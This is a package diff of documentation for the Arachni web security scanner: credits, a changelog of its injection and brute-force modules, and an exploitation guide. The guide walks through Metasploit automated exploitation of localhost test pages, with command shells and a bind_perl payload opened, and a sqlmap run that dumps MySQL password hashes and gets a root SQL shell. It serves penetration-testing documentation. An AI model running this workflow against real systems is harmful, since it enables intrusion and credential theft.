arachni 0.2.2.1

data/ACKNOWLEDGMENTS.md

@@ -0,0 +1,14 @@
+# Acknowledgments
+
+I’d like to thank:
+
+- Mr. Miles Wolbe (owner of [TinyApps.Org](http://tinyapps.org/))
+- Mr. Colin Davis (owner of [Lonava.com](http://lonava.com/))
+- The good folks from [KATHO.be](http://www.katho.be/)
+- Scott Buffington (owner of [BrutalDeluxe.us](http://brutaldeluxe.us/))
+- The people who preferred to remain anonymous
+
+for allowing me to test Arachni against their websites during the early stages of development.
+
+All the people on [GitHub](http://github.com/Zapotek/arachni/issues) 
+that have submitted bugs and given constructive feedback.

data/AUTHORS.md

@@ -0,0 +1,6 @@
+# Authors
+
+
+Tasos "Zapotek" Laskos
+        <zapotek@segfault.gr>
+        <tasos.laskos@gmail.com>

data/CHANGELOG.md

@@ -0,0 +1,162 @@
+
+# ChangeLog
+
+## Version 0.2.2.1 _(February 13, 2011)_
+- Web UI v0.1-pre (Utilizing the Client - Dispatch-server XMLRPC architecture) (**New**)
+   - Basically a front-end to the XMLRPC client
+   - Support for parallel scans
+   - Report management
+   - Can be used to monitor and control any running Dispatcher
+- Changed classification from "Vulnerabilities" to "Issues" (**New**)
+- Improved detection of custom 404 pages.
+- Reports updated to show plug-in results.
+- Updated framework-wide cookie handling.
+- Added parameter flipping functionality ( cheers to Nilesh Bhosale <nilesh at gslab.com >)
+- Major performance optimizations (4x faster in most tests)
+   - All modules now use asynchronous requests and are optimized for highest traffic efficiency
+   - All index Arrays have been replaced by Sets to minimize look-up times
+   - Mark-up parsing has been reduced dramatically
+   - File I/O blocking in modules has been eliminated
+- Crawler
+   - Improved performance
+   - Added '--spider-first" option  (**New**)
+- Substituted the XMLRPC server with an XMLRPC dispatch server  (**New**)
+   - Multiple clients
+   - Parallel scans
+   - Extensive logging
+   - SSL cert based client authentication
+- Added modules  (**New**)
+   - Audit
+      - XSS in event attributes of HTML elements
+      - XSS in HTML tags
+      - XSS in HTML 'script' tags
+      - Blind SQL injection using timing attacks
+      - Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
+      - Blind OS command injection using timing attacks (*nix, Windows)
+   - Recon
+      - Common backdoors    -- Looks for common shell names
+      - .htaccess LIMIT misconfiguration
+      - Interesting responses   -- Listens to all traffic and logs interesting server messages
+      - HTML object grepper
+      - E-mail address disclosure
+      - US Social Security Number disclosure
+      - Forceful directory listing
+- Added plugins  (**New**)
+   - Dictionary attacker for HTTP Auth
+   - Dictionary attacker for form based authentication
+   - Cookie collector    -- Listens to all traffic and logs changes in cookies
+   - Healthmap -- Generates sitemap showing the health of each crawled/audited URL
+   - Content-types -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files
+   - WAF (Web Application Firewall) Detector
+   - MetaModules -- Loads and runs high-level meta-analysis modules pre/mid/post-scan
+      - AutoThrottle -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
+      - TimeoutNotice -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with.</br>
+           It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
+      - Uniformity -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.
+
+- New behavior on Ctrl+C
+   - The system continues to run in the background instead of pausing
+   - The user is presented with an auto-refreshing report and progress stats
+- Updated module API
+   - Timing/delay attacks have been abstracted and simplified via helper methods
+   - The modules are given access to vector skipping decisions
+   - Simplified issue logging
+   - Added the option of substring matching instead of regexp matching in order to improve performance.
+   - Substituted regular expression matching with substring matching wherever possible.
+- Reports:
+   - Added plug-in formatter components allowing plug-ins to have a say in how their results are presented (**New**)
+   - New HTML report (Cheers to [Christos Chiotis](mailto:chris@survivetheinternet.com) for designing the new HTML report template.) (**New**)
+   - Updated reports to include Plug-in results:
+      - XML report
+      - Stdout report
+      - Text report
+
+## Version 0.2.1 _(November 25, 2010)_
+- Major performance improvements
+- Major system refactoring and code clean-up
+- Major module API refactoring providing even more flexibility regarding element auditing and manipulation
+- Integration with the Metasploit Framework via: (**New**)
+   - ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
+   - Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
+   - Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
+- Improved Blind SQL Injection module, significantly less requests per audit.
+- XMLRPC server (**New**)
+- XMLRPC CLI client (**New**)
+- NTLM authentication support (**New**)
+- Support for path extractor modules for the Spider (**New**)
+- Path extractors: (**New**)
+   - Generic -- extracts URLs from arbitrary text
+   - Anchors
+   - Form actions
+   - Frame sources
+   - Links
+   - META refresh
+   - Script 'src' and script code
+   - Sitemap
+- Plug-in support -- allowing the framework to be extended with virtually any functionality (**New**).
+- Added plug-ins: (**New**)
+   - Passive proxy
+   - Automated login
+- Added modules: (**New**)
+   - Audit
+      - XPath injection
+      - LDAP injection
+   - Recon
+      - CVS/SVN user disclosure
+      - Private IP address disclosure
+      - Robot file reader (in the Common Files module)
+      - XST
+      - WebDAV detection
+      - Allowed HTTP methods
+      - Credit card number disclosure
+      - HTTP PUT support
+- Extended proxy support (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0). (**New**)
+
+
+## Version 0.2 _(October 14, 2010)_
+
+- Improved output.
+  - Increased context awareness.
+  - Extensive debugging output capabilities.
+  - Added simple stats at the end of scans.
+- Rewritten HTTP interface.
+  - High-performance asynchronous HTTP requests.
+  - Adjustable HTTP request concurrency limit.
+  - Adjustable HTTP response harvests.
+  - Custom 404 page detection.
+- Optimized Trainer subsystem.
+  - Invoked when it is most likely to detect new vectors.
+  - Can be invoked by individual modules on-demand,
+      forcing Arachni to learn from the HTTP responses they will cause -- a great asset to Fuzzers.
+- Refactored and improved Auditor.
+  - No redundant requests, except when required by modules.
+  - Better parameter handling.
+  - Speed optimizations.
+  - Added differential analysis to determine whether a vulnerability needs manual verification.
+- Refactored and improved module API.
+  - Major API clean up.
+  - With facilities providing more control and power over the audit process.
+  - Significantly increased ease of development.
+  - Modules have total flexibility and control over input combinations,
+      injection values and their formating -- if they need to.
+  - Modules can opt for sync or async HTTP requests (Default: async)
+- Improved interrupt handling
+  - Scans can be paused/resumed at any time.
+  - In the event of a system exit or user cancellation reports will still be created
+      using whatever data were gathered during runtime.
+  - When the scan is paused the user will be presented with the results gathered thus far.
+- Improved configuration profile handling
+  - Added pre-configured profiles
+  - Multiple profiles can be loaded at once
+  - Ability to show running profiles as CLI arguments
+- Overall module improvements and optimizations.
+- New modules for:
+  - Blind SQL Injection, using reverse-diff analysis.
+  - Trainer, probes all inputs of a given page, in order to uncover new input vectors, and forces Arachni to learn from the responses.
+  - Unvalidated redirects.
+  - Forms that transmit passwords in clear text.
+  - CSRF, implementing 4-pass rDiff analysis to drastically reduce noise.
+- Overall report improvements and optimizations.
+- New reports
+  - Plain text report
+  - XML report

data/CONTRIBUTORS.md

@@ -0,0 +1,10 @@
+# Contributors
+
+These are the people that helped improve Arachni either by submitting code, suggestions or testing it.
+
+- [Matías Aereal Aeón](http://mfsec.com.ar/), **Arachni's official tester**.
+- [Christos Chiotis](mailto:chris@survivetheinternet.com) for designing the new HTML report template.
+- [Steve Pinkham](http://github.com/spinkham) for beta testing and patches.
+- [Aung Khant](mailto:aungkhant@yehg.net) for general suggestions.
+
+A big thanks to my buddy [Andreas](mailto:rainmakergr@gmail.com) for the original spider drawing used in the project graphics.

data/EXPLOITATION.md

@@ -0,0 +1,429 @@
+# WebApp exploitation with Arachni and Metasploit
+
+Arachni provides advanced exploitation techniques via the:
+
+ - ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
+ - Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
+ - Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
+
+
+##Installation
+
+To install the necessary files all you need to do is copy the contents of the "external/metasploit" directory to Metasploit's root.
+    $ cp -R arachni/external/metasploit/* metasploit/
+
+##Usage
+
+###Creating the Metareport
+
+#### New scan
+    $ ./arachni.rb http://localhost/~zapotek/tests/ --report=metareport:outfile=localhost.afr.msf
+    Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
+           Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
+                                          <zapotek@segfault.gr>
+                   (With the support of the community and the Arachni Team.)
+
+           Website:       http://github.com/Zapotek/arachni
+           Documentation: http://github.com/Zapotek/arachni/wiki
+
+
+     [~] No modules were specified.
+     [~]  -> Will run all mods.
+     [~] No audit options were specified.
+     [~]  -> Will audit links, forms and cookies.
+
+     [...snipping a whole lot of scan output...]
+
+     [*] Creating file for the Metasploit framework...
+     [*] Saved in 'localhost.afr.msf'.
+
+     [*] Dumping audit results in 'metareport.afr'.
+     [*] Done!
+
+#### Converting an existing report
+To convert a standard Arachni Framework Report (.afr) file to a Metareport (.afr.msf) file:
+
+    $ ./arachni.rb --repload=localhost.afr --report=metareport:outfile=localhost.afr.msf
+    Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
+           Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
+                                          <zapotek@segfault.gr>
+                   (With the support of the community and the Arachni Team.)
+
+           Website:       http://github.com/Zapotek/arachni
+           Documentation: http://github.com/Zapotek/arachni/wiki
+
+
+
+     [*] Creating file for the Metasploit framework...
+     [*] Saved in 'localhost.afr.msf'.
+
+
+### Using the Arachni plug-in via Metasploit
+
+#### Loading the ArachniMetareport
+    $ ./msfconsole  # Start the MSF
+
+                         888                           888        d8b888
+                         888                           888        Y8P888
+                         888                           888           888
+    88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
+    888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
+    888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
+    888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
+    888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
+                                               888
+                                               888
+                                               888
+
+
+           =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+    + -- --=[ 620 exploits - 307 auxiliary
+    + -- --=[ 215 payloads - 27 encoders - 8 nops
+           =[ svn r10844 updated today (2010.10.29)
+
+    msf > load arachni      # Load the Arachni plug-in
+    [*] Successfully loaded plugin: arachni
+    msf > arachni_load ../arachni/localhost.afr.msf     # Load the ArachniMetareport using the Arachni plug-in
+    [*] Loading report...
+    [*] Loaded 19 vulnerabilities.
+
+
+    Unique exploits
+    ===============
+
+        ID  Exploit                          Description
+        --  -------                          -----------
+        1   unix/webapp/arachni_php_include
+                                            This module allows complex HTTP requests to be crafted in order to
+                                    allow exploitation of PHP remote file inclusion vulnerabilities.
+
+                                    Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
+                                    i.e. where the payload should go.
+
+                                    Supported vectors: GET, POST, COOKIE, HEADER.
+                                    (Mainly for use with the Arachni plug-in.)
+
+        2   unix/webapp/arachni_exec
+                                            This module allows complex HTTP requests to be crafted in order to
+                                    allow exploitation of command injection vulnerabilities in Unix-like platforms.
+
+                                    Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
+                                    i.e. where the payload should go.
+
+                                    Supported vectors: GET, POST, COOKIE, HEADER.
+                                    (Mainly for use with the Arachni plug-in.)
+
+        3   unix/webapp/arachni_php_eval
+                                            This module allows complex HTTP requests to be crafted in order to
+                                    allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.
+
+                                    Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
+                                    i.e. where the payload should go.
+
+                                    Supported vectors: GET, POST, COOKIE, HEADER.
+                                    (Mainly for use with the Arachni plug-in.)
+
+        4   unix/webapp/arachni_sqlmap
+
+                                    This module is designed to be used with the Arachni plug-in.
+
+                                    From the original:
+
+                                            This module launches an sqlmap session.
+                                    sqlmap is an automatic SQL injection tool developed in Python.
+                                    Its goal is to detect and take advantage of SQL injection
+                                    vulnerabilities on web applications. Once it detects one
+                                    or more SQL injections on the target host, the user can
+                                    choose among a variety of options to perform an extensive
+                                    back-end database management system fingerprint, retrieve
+                                    DBMS session user and database, enumerate users, password
+                                    hashes, privileges, databases, dump entire or user
+                                    specific DBMS tables/columns, run his own SQL SELECT
+                                    statement, read specific files on the file system and much
+                                    more.
+
+
+
+
+    Vulnerabilities
+    ===============
+
+        ID  Host       Path                                    Name                   Method  Params                               Exploit
+        --  ----       ----                                    ----                   ------  ------                               -------
+        1   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        2   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        3   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX\x00"}  unix/webapp/arachni_exec
+        4   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX"}      unix/webapp/arachni_exec
+        5   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        6   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        7   127.0.0.1  /~zapotek/tests/cookies/eval.php        Code injection         COOKIE  {"eval"=>"%3BXXinjectionXX"}         unix/webapp/arachni_php_eval
+        8   127.0.0.1  /~zapotek/tests/forms/eval.php          Code injection         POST    {"eval"=>";XXinjectionXX"}           unix/webapp/arachni_php_eval
+        9   127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX\x00"}  unix/webapp/arachni_exec
+        10  127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX"}      unix/webapp/arachni_exec
+        11  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        12  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        13  127.0.0.1  /~zapotek/tests/forms/sqli.php          SQL Injection          POST    {"sql_inj"=>"1"}                     unix/webapp/arachni_sqlmap
+        14  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX\x00"}  unix/webapp/arachni_exec
+        15  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX"}      unix/webapp/arachni_exec
+        16  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        17  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        18  127.0.0.1  /~zapotek/tests/links/eval.php          Code injection         GET     {"eval"=>";XXinjectionXX"}           unix/webapp/arachni_php_eval
+        19  127.0.0.1  /~zapotek/tests/links/sqli.php          Blind SQL Injection    GET     {"id"=>"1"}                          unix/webapp/arachni_sqlmap
+
+
+
+    [*] Done!
+    msf >
+
+#### Automated exploitation (arachni_autopwn)
+
+##### Usage
+    msf > arachni_autopwn
+    [*] Usage: arachni_autopwn [options]
+            -h          Display this help text
+            -x [regexp] Only run modules whose name matches the regex
+            -a          Launch exploits against all matched targets
+            -r          Use a reverse connect shell
+            -b          Use a bind shell on a random port (default)
+            -m          Use a meterpreter shell (if possible)
+            -q          Disable exploit module output
+
+##### Example
+    msf > arachni_autopwn -a
+    [*] Running pwn-jobs...
+    [...snip...]
+    [*] Command shell session 1 opened (127.0.0.1:54598 -> 127.0.0.1:5019) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 2 opened (127.0.0.1:55336 -> 127.0.0.1:8541) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 3 opened (127.0.0.1:37880 -> 127.0.0.1:12465) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 4 opened (127.0.0.1:49451 -> 127.0.0.1:10866) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 5 opened (127.0.0.1:40276 -> 127.0.0.1:11915) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 6 opened (127.0.0.1:34400 -> 127.0.0.1:5222) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 7 opened (127.0.0.1:58456 -> 127.0.0.1:10955) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 9 opened (127.0.0.1:48549 -> 127.0.0.1:5929) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 8 opened (127.0.0.1:47028 -> 127.0.0.1:12432) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 10 opened (127.0.0.1:38239 -> 127.0.0.1:11919) at 2010-10-28 18:26:00 +0100
+    [*] Command shell session 11 opened (127.0.0.1:58541 -> 127.0.0.1:14343) at 2010-10-28 18:26:01 +0100
+    [*] Command shell session 12 opened (127.0.0.1:48655 -> 127.0.0.1:13743) at 2010-10-28 18:26:01 +0100
+    [*] Command shell session 13 opened (127.0.0.1:59996 -> 127.0.0.1:8895) at 2010-10-28 18:26:01 +0100
+    [*] Command shell session 14 opened (127.0.0.1:53717 -> 127.0.0.1:10767) at 2010-10-28 18:26:01 +0100
+    [*] Command shell session 15 opened (127.0.0.1:51623 -> 127.0.0.1:7668) at 2010-10-28 18:26:01 +0100
+    [*] Command shell session 16 opened (127.0.0.1:47874 -> 127.0.0.1:8965) at 2010-10-28 18:26:02 +0100
+    [...snip...]
+    [*] The autopwn command has completed with 16 sessions
+    [*] Enter sessions -i [ID] to interact with a given session ID
+    [*]
+    [*] ================================================================================
+
+    Active sessions
+    ===============
+
+      Id  Type   Information  Connection                          Via
+      --  ----   -----------  ----------                          ---
+      1   shell               127.0.0.1:54598 -> 127.0.0.1:5019   exploit/unix/webapp/arachni_php_eval
+      2   shell               127.0.0.1:55336 -> 127.0.0.1:8541   exploit/unix/webapp/arachni_exec
+      3   shell               127.0.0.1:37880 -> 127.0.0.1:12465  exploit/unix/webapp/arachni_exec
+      4   shell               127.0.0.1:49451 -> 127.0.0.1:10866  exploit/unix/webapp/arachni_php_include
+      5   shell               127.0.0.1:40276 -> 127.0.0.1:11915  exploit/unix/webapp/arachni_php_eval
+      6   shell               127.0.0.1:34400 -> 127.0.0.1:5222   exploit/unix/webapp/arachni_exec
+      7   shell               127.0.0.1:58456 -> 127.0.0.1:10955  exploit/unix/webapp/arachni_php_include
+      8   shell               127.0.0.1:47028 -> 127.0.0.1:12432  exploit/unix/webapp/arachni_exec
+      9   shell               127.0.0.1:48549 -> 127.0.0.1:5929   exploit/unix/webapp/arachni_exec
+      10  shell               127.0.0.1:38239 -> 127.0.0.1:11919  exploit/unix/webapp/arachni_exec
+      11  shell               127.0.0.1:58541 -> 127.0.0.1:14343  exploit/unix/webapp/arachni_php_include
+      12  shell               127.0.0.1:48655 -> 127.0.0.1:13743  exploit/unix/webapp/arachni_php_include
+      13  shell               127.0.0.1:59996 -> 127.0.0.1:8895   exploit/unix/webapp/arachni_php_include
+      14  shell               127.0.0.1:53717 -> 127.0.0.1:10767  exploit/unix/webapp/arachni_php_include
+      15  shell               127.0.0.1:51623 -> 127.0.0.1:7668   exploit/unix/webapp/arachni_php_eval
+      16  shell               127.0.0.1:47874 -> 127.0.0.1:8965   exploit/unix/webapp/arachni_php_include
+
+    [*] ================================================================================
+    msf > sessions -i 1
+    [*] Starting interaction with 1...
+
+    ls
+    eval.php
+    os_command.php
+    rfi.php
+    sqli.php
+    xss.php
+
+    whoami
+    www-data
+    ^C
+    Abort session 1? [y/N]  y
+
+    [*] Command shell session 1 closed.  Reason: User exit
+    msf >
+
+Notice that we ended up with 16 sessions out of the 19 reported vulnerabilities. <br/>
+This is due to the fact that the "unix/webapp/arachni_sqlmap" exploit can't be launched automatically and because some of the reported vulnerabilities are basically the same.
+
+Next we'll see how to use the "arachni_manual" command for assisted exploitation and get an SQL shell.
+
+### Assisted exploitation (arachni_manual)
+    msf > arachni_list_vulns    # Let's take a look at the available vulnerabilities once again.
+
+    Vulnerabilities
+    ===============
+
+        ID  Host       Path                                    Name                   Method  Params                               Exploit
+        --  ----       ----                                    ----                   ------  ------                               -------
+        1   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        2   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        3   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX\x00"}  unix/webapp/arachni_exec
+        4   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX"}      unix/webapp/arachni_exec
+        5   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        6   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        7   127.0.0.1  /~zapotek/tests/cookies/eval.php        Code injection         COOKIE  {"eval"=>"%3BXXinjectionXX"}         unix/webapp/arachni_php_eval
+        8   127.0.0.1  /~zapotek/tests/forms/eval.php          Code injection         POST    {"eval"=>";XXinjectionXX"}           unix/webapp/arachni_php_eval
+        9   127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX\x00"}  unix/webapp/arachni_exec
+        10  127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX"}      unix/webapp/arachni_exec
+        11  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        12  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        13  127.0.0.1  /~zapotek/tests/forms/sqli.php          SQL Injection          POST    {"sql_inj"=>"1"}                     unix/webapp/arachni_sqlmap
+        14  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX\x00"}  unix/webapp/arachni_exec
+        15  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX"}      unix/webapp/arachni_exec
+        16  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX\x00"}         unix/webapp/arachni_php_include
+        17  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX"}             unix/webapp/arachni_php_include
+        18  127.0.0.1  /~zapotek/tests/links/eval.php          Code injection         GET     {"eval"=>";XXinjectionXX"}           unix/webapp/arachni_php_eval
+        19  127.0.0.1  /~zapotek/tests/links/sqli.php          Blind SQL Injection    GET     {"id"=>"1"}                          unix/webapp/arachni_sqlmap
+
+
+    msf > arachni_manual 19     # The vulnerability with ID '19' uses the 'unix/webapp/arachni_sqlmap' module
+    [*] Using unix/webapp/arachni_sqlmap .
+    [*] Preparing datastore for 'Blind SQL Injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/sqli.php ...
+    SRVHOST => 127.0.0.1
+    SRVPORT => 7872
+    RHOST => 127.0.0.1
+    RPORT => 80
+    LHOST => 127.0.0.1
+    LPORT => 12633
+    SSL => false
+    GET => id=1
+    METHOD => GET
+    COOKIES =>
+    HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
+    PATH => /~zapotek/tests/links/sqli.php
+    [*] Done!
+
+    Compatible payloads
+    ===================
+
+        Name  Description
+        ----  -----------
+
+
+    Use: set PAYLOAD <name>
+    msf auxiliary(arachni_sqlmap) > show options    # Make sure that everything is setup properly
+
+    Module options:
+
+       Name         Current Setting                                         Required  Description
+       ----         ---------------                                         --------  -----------
+       COOKIES                                                              no
+       GET          id=1                                                    no        HTTP GET query
+       METHOD       GET                                                     yes       HTTP Method
+       OPTS         --users --time-test --passwords --dbs --sql-shell -v 0  no        The sqlmap options to use
+       PATH         /~zapotek/tests/links/sqli.php                          yes       The path to test for SQL injection
+       POST                                                                 no        The data string to be sent through POST
+       Proxies                                                              no        Use a proxy chain
+       RHOST        127.0.0.1                                               yes       The target address
+       RPORT        80                                                      yes       The target port
+       SQLMAP_PATH  sqlmap                                                  yes       The sqlmap >= 0.8 full path
+       VHOST                                                                no        HTTP server virtual host
+
+    msf auxiliary(arachni_sqlmap) > set SQLMAP_PATH /home/zapotek/Downloads/sqlmap/sqlmap.py    # Tell the module where the sqlmap script is
+    SQLMAP_PATH => /home/zapotek/Downloads/sqlmap/sqlmap.py
+    msf auxiliary(arachni_sqlmap) > exploit     # rock it!
+
+    [*] exec: /home/zapotek/Downloads/sqlmap/sqlmap.py -u 'http://127.0.0.1:80//~zapotek/tests/links/sqli.php?id=1' --method GET --users --time-test --passwords --dbs --sql-shell -v 0 --cookie ''
+
+        sqlmap/0.8 - automatic SQL injection and database takeover tool
+        http://sqlmap.sourceforge.net
+
+    [*] starting at: 15:08:25
+
+    [15:08:26] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+    web server operating system: Linux Ubuntu
+    web application technology: PHP 5.3.3, Apache 2.2.16
+    back-end DBMS: MySQL >= 5.0.0
+
+    time based blind sql injection payload:    'id=1%27%20AND%20SLEEP%285%29%20AND%20%27HXME%27=%27HXME'
+
+    database management system users [5]:
+    [*] 'debian-sys-maint'@'localhost'
+    [*] 'phpmyadmin'@'localhost'
+    [*] 'root'@'127.0.0.1'
+    [*] 'root'@'localhost'
+    [*] 'root'@'zonster'
+
+    database management system users password hashes:
+    [*] debian-sys-maint [1]:
+        password hash: *7AD474111CBF8492D9311D6E8493490ED6247D86
+    [*] phpmyadmin [1]:
+        password hash: *C3A70F18627A18967A3A70C0F648CDEE0BCE9AB2
+    [*] root [1]:
+        password hash: NULL
+
+    available databases [5]:
+    [*] arachni
+    [*] information_schema
+    [*] msf
+    [*] mysql
+    [*] phpmyadmin
+
+    sql-shell> CURRENT_USER()   # And we now have an SQL shell to play with!
+    do you want to retrieve the SQL statement output? [Y/n]
+    CURRENT_USER():    'root@localhost'
+    sql-shell> VERSION()
+    do you want to retrieve the SQL statement output? [Y/n]
+    VERSION():    '5.1.49-1ubuntu8'
+
+    sql-shell> q
+
+    [*] shutting down at: 15:09:07
+
+    [*] Auxiliary module execution completed
+    msf auxiliary(arachni_sqlmap) >
+
+Of course 'arachni_manual' is not limited to any one module.
+For example:
+    msf auxiliary(arachni_sqlmap) > arachni_manual 15   # Prepare the vulnerability with ID '15'
+    [*] Using unix/webapp/arachni_exec .
+    [*] Preparing datastore for 'OS command injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/os_command.php ...
+    SRVHOST => 127.0.0.1
+    SRVPORT => 9033
+    RHOST => 127.0.0.1
+    RPORT => 80
+    LHOST => 127.0.0.1
+    LPORT => 11853
+    SSL => false
+    GET => os_command=XXinjectionXX
+    METHOD => GET
+    COOKIES =>
+    HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
+    PATH => /~zapotek/tests/links/os_command.php
+    [*] Done!
+    PAYLOAD => cmd/unix/bind_perl
+    msf exploit(arachni_exec) > exploit # rock it!
+
+    [*] Sending HTTP request for /~zapotek/tests/links/os_command.php
+    [*] Started bind handler
+    [*] Command shell session 17 opened (127.0.0.1:45295 -> 127.0.0.1:11853) at 2010-10-29 15:13:48 +0100   # And we now have a system shell!
+
+    ls
+    eval.php
+    os_command.php
+    redirect.php
+    rfi.php
+    sqli.php
+    xss.php
+
+    whoami
+    www-data
+    ^C
+    Abort session 17? [y/N]  y
+
+    [*] Command shell session 17 closed.  Reason: User exit
+    msf exploit(arachni_exec) >
+